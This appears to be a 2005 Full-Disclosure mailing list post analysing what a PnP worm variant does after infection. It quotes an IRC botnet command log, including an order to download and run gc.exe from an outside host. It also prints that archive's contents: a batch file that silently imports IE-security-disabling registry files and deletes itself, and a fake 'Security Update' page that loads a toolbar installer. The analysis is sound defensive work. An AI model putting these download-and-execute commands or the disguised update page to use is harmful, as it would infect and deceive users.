lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <BAY19-DAV16883579850C1D31F27F8D9B00@phx.gbl>
Date: Wed Aug 17 00:03:39 2005
From: se_cur_ity at hotmail.com (Morning Wood)
Subject: pnp worm unknown variant - post infection actions

pnp worm unknown variant - post infection actions
Donnie Werner
http://exploitlabs.com


[ relevant info ]

[08/16/2005] (out) NICK [00|USA|618452]
[08/16/2005] (out) USER 2K-7566 * 0 :INFECTEDUSER
[08/16/2005] (in)  :hub.de NOTICE [00|USA|618452] :*** If you are having
problems connecting due to ping timeouts, please type /quote pong 5DCA1942
or /raw pong 5DCA1942 now.
[08/16/2005] (in)  PING :5DCA1942
[08/16/2005] (out) PONG 5DCA1942
[08/16/2005] (in)  :hub.de 001 [00|USA|618452] :Welcome to the hub IRC
Network [00|USA|618452]!2K-7566@...xx.xx.49

[08/16/2005] (in)  :hub.de 004 [00|USA|618452] hub.de Unreal3.2.1
iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT

[08/16/2005] (out) MODE [00|USA|618452]
[08/16/2005] (out) JOIN #upnp

[08/16/2005] (in)  :hub.de 332 [00|USA|618452] #upnp :.asc -S -s|.else
status scan .asc PnP445 120 5 0 _a _r _e _s|.if nick *USA* .r JOIN #usa
[08/16/2005] (out) JOIN #usa
[08/16/2005] (out) PRIVMSG #upnp :IRC// Sent IRC raw: "JOIN #usa".

[08/16/2005] (in)  :[00|USA|618452]!2K-7566@...xx.xx.49 JOIN :#usa
[08/16/2005] (in)  :hub.de 332 [00|USA|618452] #usa :.down
http://www.dreamcatcherprod.com/gc.exe C:\u487sdjkt.exe 1 -s|.r JOIN #rr
[08/16/2005] (out) JOIN #rr

[ gc.exe ]

gc.exe is a selfextracting archive that expands to..
02/08/2005  05:33 AM             3,496 kans.reg
01/31/2005  06:57 AM             3,276 kansup.reg
07/31/2005  11:06 PM               378 update.html
07/15/2005  05:36 AM                95 x.bat

the .bat runs..
----------
REGEDIT.EXE /S kans.reg
update.html
SLEEP 5
del kans.reg
del x.bat
----------

the .reg files disable IE Security settings

update.html contains...
----------
[TITLE]Security Update[/TITLE]
[HEAD][/HEAD]
[BODY]
[script language='JavaScript' type='text/JavaScript'
src='http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=2&loadfirst=
1&delayload=0&account_id=159900&recurrence=always&adid=a1117836900&event_typ
e=onload&signature=159900'][/script]
[script language="JavaScript"]self.focus();[/script]
----------

which installs pornographic malware.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ